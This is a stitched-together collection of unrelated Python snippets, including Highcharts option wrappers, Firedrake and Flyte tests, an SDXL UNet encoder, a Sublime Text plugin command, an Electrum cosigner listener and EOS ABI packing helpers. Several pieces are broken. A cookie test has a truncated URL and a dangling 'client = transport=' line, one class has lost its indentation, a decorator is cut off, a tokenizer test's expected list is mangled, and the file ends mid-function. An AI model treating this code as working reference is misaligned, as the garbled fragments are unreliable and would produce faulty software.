        data = {'id': self.id, 'ticket_id': self.ticket_id, 'post_id': self.post_id, 'action': self.action, 'data': self.data, 'user_id': self.user_id, 'recipient_id': self.recipient_id, 'date': self.date, 'links': {'self': (app.config['base_url'] + url_for('bp_api.get_action', id=self.id)), 'actions': (app.config['base_url'] + url_for('bp_api.get_actions', ticket_id=self.ticket_id))}}
        return data

    def __repr__(self):
        # BUGFIX: post_id previously printed self.ticket_id (copy-paste error).
        return f'<Class FlicketAction: ticket_id={self.ticket_id}, post_id={self.post_id}, action={self.action!r}, data={self.data}, user_id={self.user_id}, recipient_id={self.recipient_id}, date={self.date}>'
def test_set_cookie_with_cookiejar() -> None:
    """Set a cookie via a stdlib CookieJar and verify the server echoes it.

    NOTE(review): this block is mangled in this copy -- the URL literal and
    the `client = transport=` line are truncated; restore them from the
    original test suite before running.
    """
    url = '
    cookies = CookieJar()
    # A fully-specified http.cookiejar.Cookie for domainless path '/'.
    cookie = Cookie(version=0, name='example-name', value='example-value', port=None, port_specified=False, domain='', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=False, expires=None, discard=True, comment=None, comment_url=None, rest={'HttpOnly': ''}, rfc2109=False)
    cookies.set_cookie(cookie)
    client = transport=
    response = client.get(url)
    assert (response.status_code == 200)
    assert (response.json() == {'cookies': 'example-name=example-value'})
class ScopeHunterSupportInfoCommand(sublime_plugin.ApplicationCommand):
    """Collect environment/version info, show it, and copy it to the clipboard."""

    def run(self):
        """Gather support details, display a dialog, and fill the clipboard."""
        info = {
            'platform': sublime.platform(),
            'version': sublime.version(),
            'arch': sublime.arch(),
            'plugin_version': __version__,
            'pc_install': is_installed_by_package_control(),
        }
        try:
            import mdpopups
            info['mdpopups_version'] = format_version(mdpopups, 'version', call=True)
        except Exception:
            # mdpopups is optional; report gracefully when absent or broken.
            info['mdpopups_version'] = 'Version could not be acquired!'
        msg = textwrap.dedent(' - ST ver.: {version}\n - Platform: {platform}\n - Arch: {arch}\n - Plugin ver.: {plugin_version}\n - Install via PC: {pc_install}\n - mdpopups ver.: {mdpopups_version}\n '.format(**info))
        sublime.message_dialog(msg + '\nInfo has been copied to the clipboard.')
        sublime.set_clipboard(msg)
class TaskOneToOne(sl.Task):
    """Benchmark task with a single input target and a single output target."""

    def __init__(self, *args, **kwargs):
        # BUGFIX: the original called super(sl.Task, self).__init__, which
        # skips sl.Task's own __init__ in the MRO; initialise the base
        # class chain properly.
        super().__init__(*args, **kwargs)
        self.in_first = None  # upstream target; wired up by the workflow

    def actual_task_code(self, task_df_first):
        """Identity transform: pass the input dataframe through unchanged."""
        return task_df_first

    def out_first(self):
        """Target pointing at this task's single output-path file."""
        return sl.TargetInfo(self, ((_paths_folder + self.task_id) + '_output_path_1.txt'))

    def run(self):
        """Read the input, run the (trivial) computation, write metadata and results."""
        time.sleep(_sleep_duration)
        task_df_first = read_result(self.in_first().open().read())
        result_first = self.actual_task_code(task_df_first)
        task_md = generate_task_meta_data(self)
        task_md.add_output_meta_data(generate_data_output_meta_data(1, result_first))
        write_meta_data(((_metadata_folder + self.task_id) + '_task_meta_data.json'), task_md)
        path1 = write_result(((_results_folder + self.task_id) + '_output_result_1.pkl'), result_first)
        write_output_path(((_paths_folder + self.task_id) + '_output_path_1.txt'), path1)
class OptionPlotoptionsTreemapLevelsDatalabelsTextpath(Options):
    """Config wrapper for Highcharts treemap level data-label ``textPath``.

    NOTE(review): getter and setter share a name; ``@property``/setter
    decorators were presumably stripped from this generated code.
    """
    def attributes(self):
        return self._config_get(None)
    def attributes(self, value: Any):
        self._config(value, js_type=False)
    def enabled(self):
        # Default: text-path rendering disabled.
        return self._config_get(False)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
class _X():
def __init__(self, path=None):
self.path = (path or [])
def __getattr__(self, attr):
x = (getattr, attr)
return type(self)((self.path + [x]))
def __getitem__(self, item):
x = (getitem, item)
return type(self)((self.path + [x]))
def __call__(self, obj):
for (f, p) in self.path:
obj = f(obj, p)
return obj |
# NOTE(review): truncated decorator -- presumably `@pytest.mark.parametrize`.
.parametrize('typ', ['inject', 'prolong'])
def test_transfer_scalar_vector(typ):
    """Grid-transfer of a constant between mesh-hierarchy levels is exact."""
    mesh = UnitSquareMesh(1, 1)
    mh = MeshHierarchy(mesh, 1)
    (coarse, fine) = mh
    # Exercise both scalar and vector-valued function spaces.
    for (space, val) in [(FunctionSpace, 1), (VectorFunctionSpace, [2, 1])]:
        Vc = space(coarse, 'CG', 1)
        Vf = space(fine, 'CG', 1)
        if (typ == 'inject'):
            # inject moves data fine -> coarse
            Vdonor = Function(Vf)
            Vtarget = Function(Vc)
            transfer = inject
        else:
            # prolong moves data coarse -> fine
            Vdonor = Function(Vc)
            Vtarget = Function(Vf)
            transfer = prolong
        donor = Function(Vdonor)
        target = Function(Vtarget)
        donor.assign(Constant(val))
        transfer(donor, target)
        # A constant field must be reproduced exactly (up to round-off).
        assert numpy.allclose(target.dat.data_ro, val)
class OptionPlotoptionsNetworkgraphSonificationContexttracksMappingFrequency(Options):
    """Config wrapper for networkgraph sonification frequency mapping.

    NOTE(review): getter and setter share a name; ``@property``/setter
    decorators were presumably stripped from this generated code.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
def ziggurat_model_init(user=None, group=None, user_group=None, group_permission=None, user_permission=None, user_resource_permission=None, group_resource_permission=None, resource=None, external_identity=None, *args, **kwargs):
    """Wire the supplied model classes into a ModelProxy and their services.

    Also installs a password manager on the user class, either the one given
    via ``kwargs['passwordmanager']`` or a default built from
    ``kwargs['passwordmanager_schemes']``.
    """
    models = ModelProxy()
    for attr, model_cls in (
        ('User', user),
        ('Group', group),
        ('UserGroup', user_group),
        ('GroupPermission', group_permission),
        ('UserPermission', user_permission),
        ('UserResourcePermission', user_resource_permission),
        ('GroupResourcePermission', group_resource_permission),
        ('Resource', resource),
        ('ExternalIdentity', external_identity),
    ):
        setattr(models, attr, model_cls)
    model_service_mapping = import_model_service_mappings()
    passwordmanager = kwargs.get('passwordmanager')
    if passwordmanager:
        user.passwordmanager = passwordmanager
    else:
        user.passwordmanager = make_passwordmanager(kwargs.get('passwordmanager_schemes'))
    # Point every registered service at its model class and the proxy.
    for name, model_cls in models.items():
        for service in model_service_mapping.get(name, []):
            setattr(service, 'model', model_cls)
            setattr(service, 'models_proxy', models)
def extractQilintlCom(item):
    """Parse a qilintl.com feed item into a release message.

    Returns None for previews or items without chapter/volume info, a built
    release message when a known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    tag_rules = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    for tag, series_name, tl_type in tag_rules:
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, series_name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class TestSymbolTokenizer(TestCase):
    """Unit tests for `symbol_tokenizer` splitting behaviour.

    NOTE(review): the expected-token list in test_split is mangled in this
    copy (a URL literal was stripped); restore it before trusting that test.
    """
    def setUp(self):
        self.tokenizer = symbol_tokenizer
    def test_split(self):
        sentence = u' 1a. -- '
        tokens = [u'1a', u'.', u'--', u' u'://', u'www', u'.', u'ex', '_', u'ample', u'.', u'com']
        self.assertSequenceEqual(tokens, self.tokenizer(sentence))
    def test_unicode(self):
        # Letters and symbol runs split into separate tokens.
        sentence = u'ANj:%'
        tokens = [u'ANj', u':%']
        self.assertSequenceEqual(tokens, self.tokenizer(sentence))
    def test_unicode_hyphens(self):
        sentence = u'123-ABCDEFXYZ'
        tokens = [u'123', u'-', u'ABC', u'', u'DEF', u'', u'XYZ']
        self.assertSequenceEqual(tokens, self.tokenizer(sentence))
    def test_slashes(self):
        sentence = u'kg/meter'
        tokens = [u'kg', u'/', u'meter']
        self.assertSequenceEqual(tokens, self.tokenizer(sentence))
    def test_superscript_numbers(self):
        sentence = u'per m3 earth'
        tokens = [u'per', u'm', u'3', u'earth']
        self.assertSequenceEqual(tokens, self.tokenizer(sentence))
def test_guess_dict():
    """Round-trip a bare ``dict`` annotation through the Flyte TypeEngine.

    NOTE(review): `t2` is later used via `dispatch_execute`, so it was
    presumably decorated with `@task` in the original source -- the
    decorator is missing from this copy.
    """
    def t2(a: dict) -> str:
        return ', '.join([f'K: {k} V: {v}' for (k, v) in a.items()])
    task_spec = get_serializable(OrderedDict(), serialization_settings, t2)
    # An unparameterised dict is modelled as a generic STRUCT.
    assert (task_spec.template.interface.inputs['a'].type.simple == SimpleType.STRUCT)
    pt = TypeEngine.guess_python_type(task_spec.template.interface.inputs['a'].type)
    assert (pt is dict)
    input_map = {'a': {'k1': 'v1', 'k2': '2'}}
    guessed_types = {'a': pt}
    ctx = context_manager.FlyteContext.current_context()
    lm = TypeEngine.dict_to_literal_map(ctx, d=input_map, type_hints=guessed_types)
    assert isinstance(lm.literals['a'].scalar.generic, Struct)
    output_lm = t2.dispatch_execute(ctx, lm)
    str_value = output_lm.literals['o0'].scalar.primitive.string_value
    # dict iteration order of the protobuf Struct is not guaranteed.
    assert ((str_value == 'K: k2 V: 2, K: k1 V: v1') or (str_value == 'K: k1 V: v1, K: k2 V: 2'))
def initialize_nodes(nodes: Union[('BaseNodeSpec', List['BaseNodeSpec'])], process_id: int, ns: str, message_broker: Any, is_initialized: Dict, sp_nodes: Dict, launch_nodes: Dict, rxnode_cls: Any=None, node_args: Dict=None):
    """Initialise a (list of) node spec(s) in-process, as a subprocess, or externally.

    Mutates `is_initialized`, `sp_nodes` and `launch_nodes` in place:
    - same process: constructs `rxnode_cls` and stores it in `sp_nodes`
    - NEW_PROCESS (from the environment process): launches the node's
      executable via subprocess and stores the Popen in `launch_nodes`
    - EXTERNAL: only logs the command the user must run themselves
    A subscriber per node flips `is_initialized[name]` when the node reports in.
    """
    if (rxnode_cls is None):
        # Imported lazily to avoid a circular import at module load time.
        from eagerx.core.executable_node import RxNode
        rxnode_cls = RxNode
    if (not isinstance(nodes, list)):
        nodes = [nodes]
    from eagerx.core.specs import BaseNodeSpec
    assert all([isinstance(n, BaseNodeSpec) for n in nodes])
    bnd = message_broker.backend
    for node in nodes:
        name = node.config.name
        is_initialized[name] = False
        node_address = ((ns + '/') + name)
        assert ((node_address not in sp_nodes) and (node_address not in launch_nodes)), ('Node "%s" already exists. Node names must be unique!' % name)
        def initialized(msg, name):
            # Callback: the node published on its '/initialized' topic.
            is_initialized[name] = True
        # `partial` binds `name` now, avoiding the late-binding closure pitfall.
        sub = message_broker.backend.Subscriber((node_address + '/initialized'), 'int64', partial(initialized, name=name))
        message_broker.subscribers.append(sub)
        if (node.config.process == process_id):
            if (node_args is None):
                node_args = dict()
            sp_nodes[node_address] = rxnode_cls(name=node_address, message_broker=message_broker, **node_args)
            sp_nodes[node_address].node_initialized()
        elif ((node.config.process == process.NEW_PROCESS) and (process_id == process.ENVIRONMENT)):
            assert ('executable' in node.config), ('No executable defined. Node "%s" can only be launched as a separate process if an executable is specified.' % name)
            cmd = get_launch_cmd(node.config.executable, bnd, ns, name, external=False)
            launch_nodes[node_address] = subprocess.Popen(cmd)
        elif (node.config.process == process.EXTERNAL):
            cmd = get_launch_cmd(node.config.executable, bnd, ns, name, external=True)
            cmd_joined = ' '.join(cmd).replace('\n', '\\n')
            message_broker.backend.loginfo(f'Launch node "{name}" externally with: python3 {cmd_joined}')
def do_access(fa_fname, exclude_fnames=(), min_gap_size=5000, skip_noncanonical=True):
    """Compute sequencing-accessible regions from a FASTA file.

    Optionally drops non-canonical contigs, subtracts each BED3 exclusion
    file, then joins regions separated by gaps smaller than `min_gap_size`.
    """
    regions = get_regions(fa_fname)
    if skip_noncanonical:
        regions = drop_noncanonical_contigs(regions)
    accessible = GA.from_rows(regions)
    for exclude_fname in exclude_fnames:
        accessible = accessible.subtract(tabio.read(exclude_fname, 'bed3'))
    return GA.from_rows(join_regions(accessible, min_gap_size))
class IConfigRepository(ABC):
    """Read-only interface over one or more configuration sources.

    NOTE(review): method bodies are `...` but `@abstractmethod` decorators
    are absent -- presumably stripped from this copy of the source.
    """
    def get_schema_source(self) -> ConfigSource:
        ...
    def load_config(self, config_path: str) -> Optional[ConfigResult]:
        # Returns None when the config cannot be found.
        ...
    def group_exists(self, config_path: str) -> bool:
        ...
    def config_exists(self, config_path: str) -> bool:
        ...
    def get_group_options(self, group_name: str, results_filter: Optional[ObjectType]=ObjectType.CONFIG) -> List[str]:
        ...
    def get_sources(self) -> List[ConfigSource]:
        ...
    def initialize_sources(self, config_search_path: ConfigSearchPath) -> None:
        ...
class TestANSIString(TestCase):
    """Checks length, clean, raw and format handling of ANSI colour markup."""

    def setUp(self):
        self.example_raw = '|relectric |cboogaloo|n'
        self.example_ansi = ANSIString(self.example_raw)
        self.example_str = 'electric boogaloo'
        self.example_output = '\x1b[1m\x1b[31melectric \x1b[1m\x1b[36mboogaloo\x1b[0m'

    def test_length(self):
        """len() counts only the visible characters, not the escape codes."""
        self.assertEqual(len(self.example_ansi), 17)

    def test_clean(self):
        """clean() strips all colour markup from the string."""
        self.assertEqual(self.example_ansi.clean(), self.example_str)

    def test_raw(self):
        """raw() renders markup codes to actual ANSI escape sequences."""
        self.assertEqual(self.example_ansi.raw(), self.example_output)

    def test_format(self):
        """Format-spec padding applies to the visible length only."""
        self.assertEqual(f'{self.example_ansi:0<20}', self.example_output + '000')
def safe_log_prob_sum(distrib, value: torch.Tensor) -> torch.Tensor:
    """Sum of log-probabilities of `value` under `distrib`.

    Returns -Inf (on `value`'s device) instead of raising when the failure
    was caused by `value` lying outside the distribution's support; any
    other RuntimeError/ValueError is re-raised.
    """
    try:
        return distrib.log_prob(value).sum()
    except (RuntimeError, ValueError) as err:
        in_support = distrib.support.check(value).all()
        if in_support:
            # Not a support violation -- surface the original error.
            raise err
        return torch.tensor(float('-Inf')).to(value.device)
class SocialAuthJWTTests(mixins.SocialAuthMixin, mixins.SocialAuthJWTMixin, SchemaTestCase):
    """Schema tests for the JWT-issuing socialAuth mutation.

    The mixins drive the GraphQL `query` below and assert on the result.
    """
    query = '\n    mutation SocialAuth($provider: String!, $accessToken: String!) {\n      socialAuth(provider: $provider, accessToken: $accessToken) {\n        social {\n          uid\n          extraData\n        }\n        token\n      }\n    }'
    class Mutations(graphene.ObjectType):
        # Schema root exposing only the mutation under test.
        social_auth = graphql_social_auth.SocialAuthJWT.Field()
class DownBlocks(fl.Chain):
    """Encoder (down-sampling) half of the SDXL UNet as a Chain of blocks."""
    def __init__(self, in_channels: int, device: ((Device | str) | None)=None, dtype: (DType | None)=None) -> None:
        # Stored before super().__init__ so the attribute survives Chain setup.
        self.in_channels = in_channels
        # Stem: project the input image latents to 320 channels.
        in_block = fl.Chain(fl.Conv2d(in_channels=in_channels, out_channels=320, kernel_size=3, padding=1, device=device, dtype=dtype))
        # Stage 1: 320-channel residual blocks, no attention, then downsample.
        first_blocks = [fl.Chain(ResidualBlock(in_channels=320, out_channels=320, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=320, out_channels=320, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=320, scale_factor=2, padding=1, device=device, dtype=dtype))]
        # Stage 2: widen to 640 channels with 2-layer cross-attention, then downsample.
        second_blocks = [fl.Chain(ResidualBlock(in_channels=320, out_channels=640, device=device, dtype=dtype), SDXLCrossAttention(channels=640, num_attention_layers=2, num_attention_heads=10, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=640, out_channels=640, device=device, dtype=dtype), SDXLCrossAttention(channels=640, num_attention_layers=2, num_attention_heads=10, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=640, scale_factor=2, padding=1, device=device, dtype=dtype))]
        # Stage 3: widen to 1280 channels with deep (10-layer) cross-attention.
        third_blocks = [fl.Chain(ResidualBlock(in_channels=640, out_channels=1280, device=device, dtype=dtype), SDXLCrossAttention(channels=1280, num_attention_layers=10, num_attention_heads=20, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=1280, out_channels=1280, device=device, dtype=dtype), SDXLCrossAttention(channels=1280, num_attention_layers=10, num_attention_heads=20, device=device, dtype=dtype))]
        super().__init__(in_block, *first_blocks, *second_blocks, *third_blocks)
class OptionPlotoptionsGaugeTooltip(Options):
    """Config wrapper for Highcharts ``plotOptions.gauge.tooltip``.

    Each option is a getter (returning the Highcharts default via
    ``_config_get``) paired with a same-named setter.

    NOTE(review): getter and setter share a name; ``@property``/setter
    decorators were presumably stripped from this generated code.
    """
    def clusterFormat(self):
        return self._config_get('Clustered points: {point.clusterPointsAmount}')
    def clusterFormat(self, text: str):
        self._config(text, js_type=False)
    def dateTimeLabelFormats(self) -> 'OptionPlotoptionsGaugeTooltipDatetimelabelformats':
        return self._config_sub_data('dateTimeLabelFormats', OptionPlotoptionsGaugeTooltipDatetimelabelformats)
    def distance(self):
        return self._config_get(16)
    def distance(self, num: float):
        self._config(num, js_type=False)
    def followPointer(self):
        return self._config_get(False)
    def followPointer(self, flag: bool):
        self._config(flag, js_type=False)
    def followTouchMove(self):
        return self._config_get(True)
    def followTouchMove(self, flag: bool):
        self._config(flag, js_type=False)
    def footerFormat(self):
        return self._config_get('')
    def footerFormat(self, text: str):
        self._config(text, js_type=False)
    def format(self):
        return self._config_get('undefined')
    def format(self, text: str):
        self._config(text, js_type=False)
    def headerFormat(self):
        return self._config_get('')
    def headerFormat(self, text: str):
        self._config(text, js_type=False)
    def nullFormat(self):
        return self._config_get(None)
    def nullFormat(self, text: str):
        self._config(text, js_type=False)
    def nullFormatter(self):
        return self._config_get(None)
    def nullFormatter(self, value: Any):
        self._config(value, js_type=False)
    def pointFormat(self):
        return self._config_get(None)
    def pointFormat(self, text: str):
        self._config(text, js_type=False)
    def pointFormatter(self):
        return self._config_get(None)
    def pointFormatter(self, value: Any):
        self._config(value, js_type=False)
    def valueDecimals(self):
        return self._config_get(None)
    def valueDecimals(self, num: float):
        self._config(num, js_type=False)
    def valuePrefix(self):
        return self._config_get(None)
    def valuePrefix(self, text: str):
        self._config(text, js_type=False)
    def valueSuffix(self):
        return self._config_get(None)
    def valueSuffix(self, text: str):
        self._config(text, js_type=False)
    def xDateFormat(self):
        return self._config_get(None)
    def xDateFormat(self, text: str):
        self._config(text, js_type=False)
class InterComBackEndAnalysisPlugInsPublisher(InterComRedisInterface):
    """Publishes the available analysis plug-ins to Redis on construction."""

    def __init__(self, analysis_service=None):
        super().__init__()
        self.publish_available_analysis_plugins(analysis_service)

    def publish_available_analysis_plugins(self, analysis_service):
        """Store the service's plug-in dictionary under the 'analysis_plugins' key."""
        plugin_dict = analysis_service.get_plugin_dict()
        self.redis.set('analysis_plugins', plugin_dict)
class ArticleCollectsView(View):
    """Toggle the current user's collect (favourite) state on an article."""

    def post(self, request, nid):
        res = {'msg': '!', 'code': 412, 'isCollects': True, 'data': 0}
        if not request.user.username:
            # Anonymous users cannot collect articles.
            res['msg'] = ''
            return JsonResponse(res)
        res['code'] = 0
        already_collected = request.user.collects.filter(nid=nid)
        if already_collected:
            # Un-collect and decrement the counter.
            res['msg'] = '!'
            res['isCollects'] = False
            request.user.collects.remove(nid)
            delta = -1
        else:
            request.user.collects.add(nid)
            delta = 1
        article_query = Articles.objects.filter(nid=nid)
        # Atomic counter update via an F-expression, then re-read the value.
        article_query.update(collects_count=(F('collects_count') + delta))
        res['data'] = article_query.first().collects_count
        return JsonResponse(res)
class Listener(util.DaemonThread):
    """Daemon thread polling the cosigner-pool server for incoming messages.

    Emits `cosigner_received_signal` at most once per keyhash until the
    entry is cleared via `clear`.
    """
    def __init__(self, parent: 'CosignerPool'):
        super().__init__('cosigner')
        self.daemon = True
        self.parent = parent
        # keyhashes whose message has already been delivered this session
        self.received: Set[str] = set()
    def clear(self, keyhash_hex: str) -> None:
        """Delete the server-side message and forget it locally."""
        server.delete(keyhash_hex)
        self.received.remove(keyhash_hex)
    def run(self) -> None:
        """Poll loop: check each signable wallet's keyhash every 30 seconds."""
        while self.running:
            # Only wallets that can sign are worth polling.
            relevant_items = [item for item in self.parent._items if (not item.watching_only)]
            if (not relevant_items):
                time.sleep(2)
                continue
            for item in relevant_items:
                if (item.keyhash_hex in self.received):
                    continue
                try:
                    message = server.get(item.keyhash_hex)
                except Exception as e:
                    # Network failure: back off before retrying the whole loop.
                    logger.error('cannot contact cosigner pool')
                    time.sleep(30)
                    continue
                if message:
                    self.received.add(item.keyhash_hex)
                    logger.debug('received message for %s', item.keyhash_hex)
                    app_state.app.cosigner_received_signal.emit(item, message)
            time.sleep(30)
def generate_env_vars_dicts_list(num_containers: int, repository_path: Optional[str]=None, server_certificate_provider: Optional[CertificateProvider]=None, server_certificate_path: Optional[str]=None, ca_certificate_provider: Optional[CertificateProvider]=None, ca_certificate_path: Optional[str]=None, server_ip_addresses: Optional[List[str]]=None, server_hostnames: Optional[List[str]]=None, server_private_key_ref_provider: Optional[PrivateKeyReferenceProvider]=None) -> List[Dict[(str, str)]]:
    """Build one env-var dict per container, distributing per-container IPs/hostnames.

    Validates that the per-container lists (when given) match `num_containers`.
    """
    _validate_env_vars_length(num_containers=num_containers, server_ip_addresses=server_ip_addresses, server_hostnames=server_hostnames)
    env_dicts = []
    for index in range(num_containers):
        env_dicts.append(
            generate_env_vars_dict(
                repository_path=repository_path,
                server_certificate_provider=server_certificate_provider,
                server_certificate_path=server_certificate_path,
                ca_certificate_provider=ca_certificate_provider,
                ca_certificate_path=ca_certificate_path,
                server_ip_address=server_ip_addresses[index] if server_ip_addresses else None,
                server_hostname=server_hostnames[index] if server_hostnames else None,
                server_private_key_ref_provider=server_private_key_ref_provider,
            )
        )
    return env_dicts
class Progressbar():
    """Simple in-place terminal progress bar with an elapsed-minutes readout."""

    def __init__(self, start_time, label, width=33):
        self.start_time = start_time
        self.label = label
        self.width = width
        self.prc = '='    # fill character
        self.pdc = ' '    # pad character
        self.head = '['
        self.tail = ']'
        self._lastlen = 0  # length of the previously printed line

    def out(self, tot, scanned):
        """Render progress `scanned`/`tot`, backspacing over the previous line."""
        filled = int((scanned * self.width) // (tot if tot > 0 else 1))
        padding = self.width - filled
        minutes = int(time.time() - self.start_time) // 60
        bar = '%s%s%s%s' % (self.head, self.prc * filled, self.pdc * padding, self.tail)
        line = '%s %d of %d %s in %d minutes' % (bar, scanned, tot, self.label, minutes)
        if self._lastlen:
            # Erase the previous render with backspaces.
            sys.stdout.write('\x08' * self._lastlen)
        self._lastlen = len(line)
        stdoutw(line)
def mock_system_accounts_are_secured(self, cmd):
    """Fake subprocess result for the 'system accounts are secured' check.

    Returns UID_MIN output for login.defs queries, otherwise a sample
    /etc/passwd listing; always succeeds with empty stderr.
    """
    if 'UID_MIN' in cmd:
        stdout = ['1000', '']
    else:
        stdout = ['root:x:0:0:root:/root:/bin/bash', 'sync:x:5:0:sync:/sbin:/bin/sync', 'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown', 'halt:x:7:0:halt:/sbin:/sbin/halt', 'nobody:x:99:99:Nobody:/:/sbin/nologin', 'vagrant:x:1000:1000:vagrant:/home/vagrant:/bin/bash']
    return SimpleNamespace(stdout=stdout, stderr=[''], returncode=0)
class GCIso():
    """Metadata record for a GameCube ISO image."""

    def __init__(self, name: str, root: str, system_code, game_code, region_code, publisher_code, compiler, sha1):
        # Identification
        self.name = name
        self.root = root
        # Header codes (looked up in the module-level code tables)
        self.system_code = system_code
        self.game_code = game_code
        self.region_code = region_code
        self.publisher_code = publisher_code
        # Build information
        self.compiler = compiler
        self.sha1 = sha1

    def get_system_name(self):
        """Human-readable system name from the `system_codes` table."""
        return system_codes[self.system_code]

    def get_publisher_name(self):
        """Human-readable publisher name from the `publisher_codes` table."""
        return publisher_codes[self.publisher_code]

    def get_region_name(self):
        """Human-readable region name from the `region_codes` table."""
        return region_codes[self.region_code]
def run_write_read(mesh, fs, degree, dumpfile):
    """Round-trip Functions through HDF5File, with and without timestamps.

    Writes f (= x*y) and g (= 1 + x*y) and checks that reading back by
    timestamp recovers each one.
    """
    V = FunctionSpace(mesh, fs, degree)
    f = Function(V, name='f')
    x = SpatialCoordinate(mesh)
    f.interpolate((x[0] * x[1]))
    g = Function(V, name='g')
    g.interpolate((1 + (x[0] * x[1])))
    f2 = Function(V, name='f')
    g2 = Function(V, name='g')
    # All ranks must agree on the file name.
    dumpfile = mesh.comm.bcast(dumpfile, root=0)
    with HDF5File(dumpfile, 'w', comm=mesh.comm) as h5:
        h5.write(f, '/solution')
        h5.read(f2, '/solution')
    assert np.allclose(f.dat.data_ro, f2.dat.data_ro)
    # Second pass: the same dataset name, distinguished by timestamps.
    with HDF5File(dumpfile, 'w', comm=mesh.comm) as h5:
        h5.write(f, '/solution', timestamp=math.pi)
        h5.write(g, '/solution', timestamp=0.1)
        h5.read(f2, '/solution', timestamp=math.pi)
        h5.read(g2, '/solution', timestamp=0.1)
    # g = f + 1, so the recovered g2 must dominate f2.
    with g2.dat.vec as x, f2.dat.vec as y:
        assert (x.max() > y.max())
    assert np.allclose(f.dat.data_ro, f2.dat.data_ro)
def dnd_bind(widget, sequence=None, func=None, add=None, need_cleanup=True):
    """Drag-and-drop variant of Tk's Misc.bind using the DnD substitution format.

    - func as str: bind that Tcl command string directly.
    - func as callable: register it with DnD event substitution and return
      the generated Tcl function id.
    - only sequence given: return the current binding for that sequence.
    - no args: return all bound sequences.
    """
    what = ('bind', widget._w)
    if isinstance(func, str):
        # Already a Tcl command string; bind verbatim.
        widget.tk.call((what + (sequence, func)))
    elif func:
        func_id = widget._register(func, widget._substitute_dnd, need_cleanup)
        # A '+' prefix appends to existing bindings instead of replacing them.
        cmd = ('%s%s %s' % (((add and '+') or ''), func_id, widget._subst_format_str_dnd))
        widget.tk.call((what + (sequence, cmd)))
        return func_id
    elif sequence:
        # Query mode: current binding for the sequence.
        return widget.tk.call((what + (sequence,)))
    else:
        # List mode: all sequences bound on this widget.
        return widget.tk.splitlist(widget.tk.call(what))
class CliArgs():
    """Command-line argument helper for HDL simulation runs.

    Exposes -t (test name), -s (simulation tool), -b (batch mode, disables
    the GUI) and -d (one or more defines).
    """

    def __init__(self, default_test='test', default_simtool='modelsim', default_gui=True, default_defines=None):
        # BUGFIX: avoid a mutable default argument ([]) shared across
        # instances; None is translated to a fresh list per instance.
        if default_defines is None:
            default_defines = []
        self.args_parser = argparse.ArgumentParser()
        self.args_parser.add_argument('-t', default=default_test, metavar='<name>', dest='test', help=("test <name>; default is '%s'" % default_test))
        self.args_parser.add_argument('-s', default=default_simtool, metavar='<name>', dest='simtool', help=("simulation tool <name>; default is '%s'" % default_simtool))
        self.args_parser.add_argument('-b', default=default_gui, dest='gui', action='store_false', help='enable batch mode (no GUI)')
        self.args_parser.add_argument('-d', default=default_defines, metavar='<def>', dest='defines', nargs='+', help='define <name>; option can be used multiple times')

    def parse(self):
        """Parse sys.argv and return the populated namespace."""
        return self.args_parser.parse_args()
def q_a(m0, m1, m2, o0, o1, o2, n0, n1, n2):
    """Angle in radians at vertex O=(o0,o1,o2) between rays O->M and O->N.

    Computed as acos of the normalised dot product of the two edge vectors;
    raises math domain/zero-division errors for degenerate (zero-length) rays.
    """
    ux, uy, uz = m0 - o0, m1 - o1, m2 - o2
    vx, vy, vz = n0 - o0, n1 - o1, n2 - o2
    dot = (ux * vx) + (uy * vy) + (uz * vz)
    norm_u = math.sqrt((ux ** 2) + (uy ** 2) + (uz ** 2))
    norm_v = math.sqrt((vx ** 2) + (vy ** 2) + (vz ** 2))
    return math.acos(dot / (norm_u * norm_v))
class EosType():
    """Base for fixed-size EOS ABI scalar types packed via `struct`.

    Subclasses set `size` (byte width) and `fmt` (struct format string).

    NOTE(review): methods take `cls` and are used like classmethods
    (e.g. `VarUint32.pack(...)`); `@classmethod` decorators were presumably
    stripped from this copy of the source.
    """
    size: int = None   # byte width of one packed value
    fmt: str = None    # struct format string for one value
    def pack(cls, value: int) -> bytes:
        """Serialise one value to bytes."""
        return struct.pack(cls.fmt, value)
    def unpack(cls, value: bytes) -> int:
        """Deserialise one value from the first `size` bytes."""
        return struct.unpack(cls.fmt, value[:cls.size])[0]
    def pack_array(cls, items: list) -> bytes:
        """Serialise a list as a VarUint32 length prefix plus packed items."""
        mbytes = b''
        mbytes += VarUint32.pack(len(items))
        for item in items:
            mbytes += cls.pack(item)
        return mbytes
    def unpack_array(cls, packed_bytes: bytes) -> List:
        """Deserialise a length-prefixed array of values."""
        (size, array_len) = VarUint32.unpack(packed_bytes)
        packed_bytes = packed_bytes[size:]
        values = []
        for i in range(0, array_len):
            value = cls.unpack(packed_bytes)
            values.append(value)
            # Advance past the fixed-size element just consumed.
            packed_bytes = packed_bytes[cls.size:]
        return values
def populate_install_tree(inst_dir, path_map):
    """Copy mapped files into a fresh install tree and make it importable.

    `path_map` values must expose `.src` (absolute source path) and `.dest`
    (path relative to `inst_dir`). Every destination directory -- including
    the root -- that never received an `__init__.py` gets an empty one.
    """
    os.mkdir(inst_dir)
    # Maps relative dir path -> True once an __init__.py landed there.
    dir_has_init = {'': False}

    def ensure_dir(rel_path):
        # Create rel_path (and any missing parents) under inst_dir, once.
        if rel_path in dir_has_init:
            return
        ensure_dir(os.path.dirname(rel_path))
        os.mkdir(os.path.join(inst_dir, rel_path))
        dir_has_init[rel_path] = False

    for info in path_map.values():
